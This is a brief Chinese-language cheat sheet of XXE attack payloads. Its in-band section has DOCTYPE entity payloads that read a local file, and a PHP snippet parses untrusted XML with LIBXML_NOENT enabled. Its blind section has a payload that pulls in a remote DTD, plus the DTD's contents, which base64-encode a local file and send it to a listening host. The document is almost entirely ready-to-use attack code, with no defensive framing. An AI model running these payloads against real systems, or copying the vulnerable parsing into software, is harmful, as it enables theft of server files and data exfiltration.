XXE payload

有回显：

<!DOCTYPE root [
  <!ENTITY c PUBLIC "bar" "C:/test.txt">
]>
<test>&c;</test>

<!DOCTYPE ANY [
  <!ENTITY f SYSTEM "C:/test.txt">
]>
<x>&f;</x>

PHP代码示例：

echo (simplexml_load_string('<?xml version="1.0"?>
  <!DOCTYPE ANY [
    <!ENTITY f SYSTEM "C:/test.txt">
  ]>
<x>&f;</x>', "SimpleXMLElement", LIBXML_NOENT));

无回显：

<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://127.0.0.1:9999/test.dtd">
%remote;%int;%send;
]>

http://127.0.0.1:9999/test.dtd文件内容：

<!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=file:///D:/test.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://127.0.0.1:9999/?p=%file;'>">